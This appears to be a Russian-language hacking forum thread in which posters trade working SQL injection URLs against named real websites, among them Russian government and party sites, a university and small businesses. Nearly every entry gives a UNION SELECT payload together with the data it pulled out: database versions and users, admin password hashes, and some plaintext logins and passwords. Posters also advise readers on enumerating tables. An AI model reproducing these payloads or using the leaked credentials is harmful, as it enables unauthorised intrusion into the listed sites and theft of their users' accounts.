SQL Инъекции

Code:

http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+1,2,unhex(hex(version())),4/*

Версия 4,но мне повезло

Code:

http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-41+union+select+unhex(hex(password)),2,unhex(hex(user)),4+from+mysql.user/*

root: 066bc62049564980

 

Пополним коллекцию:

http://www.svadba.tu2.ru/

Code:

http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user,0x3a,database())--

version() - 5.0.51a
user() - logsvadba6@localhost
database() - logsvadba6

Достаем хэш админа:

Code:

http://www.svadba.tu2.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users--

username : pass(md5) : salt

admin : 589ffec19b0ce895974aec9a5425e603 : S6L9oPNyOuyrzK9d

 

Code:

http://www.unioneconsulenti.it/article.php?sid=1%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9/*

Code:

5.0.32-Debian_7etch1-log:unioneconsulenti:userconsulenti@localhost

Code:

http://www.ipodhacks.com/article.php?sid=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11/*

Code:

4.0.27-standard:ipodhack_mains

 

Ну и я немного :

Code:

http://www.flirtanica.ru/articles1.php?id=-262+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())/*

4.1.22:wwwflirtanicaru:flirtani@localhost

 

Code:

http://www.barcelo.edu.ar/vernoticia.php?id=-1+union+select+1,2,3,4,5,6,7,8,unhex(hex(user())),unhex(hex(version())),unhex(hex(database())),12,13,14,15,16,17,18,19,20,21/*

uv0001@localhost
4.1.14-log

uv0001_barcelo

 

АвиаБилеты в Москве

www.samoletom.ru

Code:

http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),4,5,6,7,8,9,10/*

samoletom_db@localhost, 5.0.18-log

Таблички нормально перебираются

Code:

http://www.samoletom.ru/txt/spo.php?id=-59+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+16,1/*

 

avis-tour.ru

Code:

http://www.avis-tour.ru/?action=country&do=1&id=75&page_id=-37+UNION+SELECT+1,2,concat_ws(0x1,id,u_login,u_passwd,u_name,u_active)+from+t_users%20limit%200,1/*

2
Julia
9410323
Julia
1
3
Admin
frekbyby935
Admin
0
Админка даж не представляю куда спряталось

 

http://www.dubkow-muehle.de

Code:

http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())--

version() - 5.0.45
user() - ks0114@localhost
database() - ks0114db4

Достаем хэш админа:

Code:

http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users--

login : pass(md5)

admin : 4518a2bcb56db571ef9002d9787b9365

 

Ракрутил с помощью ачатовца)))
А из форума ничё не выудил, а админка стоит огронечитель по IP, обидно блин! хотя взломать то можно, только сплоита под версию того форума я не нашел((((

 

Какая то шляпа..
http://www.abllm.se/?produkt=-1+union+select+1,2,3,4,5,6,7,concat(name,0x3a3a,pass),9,10,11,12,13,14,15,16,17,18+from+users+limit+4,1

login:goran pass:John6320 http://www.abllm.se/admin/
--------------------------------------------------------------------------------

Тоже Г*** непонятного назначения...
p://www.fraktsidan.se/read.php?id=-1+union+select+1,concat(username,0x3a3a,pass),3,4,5,6,7,8,9,10,11+from+frakt_users+limit+0,1/*
login:Christer pass:3596

----------------------------------------------------------------
Туси!!!!(co Jaccass)

http://lanpartys.tv/artikel.php?y=&m=-1+union+select+1,concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+usr_web22_1.np_user+limit+0,1/*

login:admin pass:budsabong

 

Скули..

Theplace.ru - трафистый сайт )

5 ветка, таблы..

юзеры.. походу от форума..


Mares.com

5 версия.. таблы..

/admin


Fotohoster.ru

Vstile.ru
Мне домен понравился )

 

http://www.er34.ru/

Единая Россия

Code:

http://www.er34.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())--

version() - 5.0.51a-log
user() - [email protected]
database() - HST-79811-1

Админ:

Code:

http://www.er34.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password)+from+jos_users--

login : password

amdin : 99be844677c58d723605ea5a1b558741

P.S: админский логин именно amdin, а не admin.

Расшифровать неполучилось(

 

Кто там не любит власть?

Code:

http://sao.mos.ru/?r=9_9&cat=16&type=28'

Поддомены

Code:

http://vdeg.sao.mos.ru/news_full.php?id=-16583+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*

4.1.12:sao@chicken:sao

 

http://www.marinersoftware.com/sitepage.php?page=-85+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

/home/marinersoftware/www/sitepage.php

marinersoftware@localhost
4.0.24
marinersoftware

 

Code:

http://www.contzert.ru/?page=order&id=99999+union+select+1,2,concat(0x3a3a,user(),0x3a3a,version(),0x3a3a,database()),4,5,6,7,8,9,10,11/*

 

hst-79811-1.admins
username
user_password

hst-79811-1.ibf_members_converge
converge_pass_hash
converge_pass_salt

hst-79811-1.sn_admins
admin_id
login
password

adminyug:5b16e49c4618bfc9b90665f38687af57
adminyug:5c8d3eee993f0bd5cde03ae5e018e5ac
yugrig:61686402abe82e0748c9fef76fb9f326
amdin:99be844677c58d723605ea5a1b558741

Хорошие пароли у него похоже

 

Code:

http://www.barcelo.edu.ar/vernoticia.php?id=1+union+select+1,2,3,4,5,6,7,8,unhex(hex(version())),10,11,12,13,14,15,16,17,18,19,20,21/*
http://www.calcsandmore.com/hlavni.php3?PLANG=&rec=-1+union+Select+version()/*
http://www.dr-wellering.de/index.php?topid=675&groupid=3226&subgroupid=0&contentid=-7331+union+select++1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,unhex(hex(version())),24,25/*
http://www.infosecur.ru/out_e.php?id=-1018+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13/*
http://intelt.com/spb/hotel/?id=-1+union+select+1,version(),user(),4,5/*

 

Code:

http://www.unitedcorevision.com/id/print.php?type=A&zid=1+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9/*

 

version():5

 

))

Вот что я нарыл за 3 часа

http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
http://www.rdi-cam.com/pic.php?i=-33+union+select+1,2,3,4,5,6,7,8/*
--
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,2,3&limit=0
Список БД
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES&limit=0
--
http://www.merryhearts.org/news.php?id=-13+union+select+1,2,3,4,5,6,7/*
http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMATION_SCHEMA.TABLES+limit+25,1&te=0
http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMAT ION_SCHEMA.TABLES+limit+15,1&te=0
http://ledi.ru/news.php?id=-13+union+select+1,2,3,table_name,5,6+from+INFORMAT ION_SCHEMA.TABLES+limit+16,1&te=0

Можете по перебирать таблицы используя limit+от 0,1 до непомню до скольки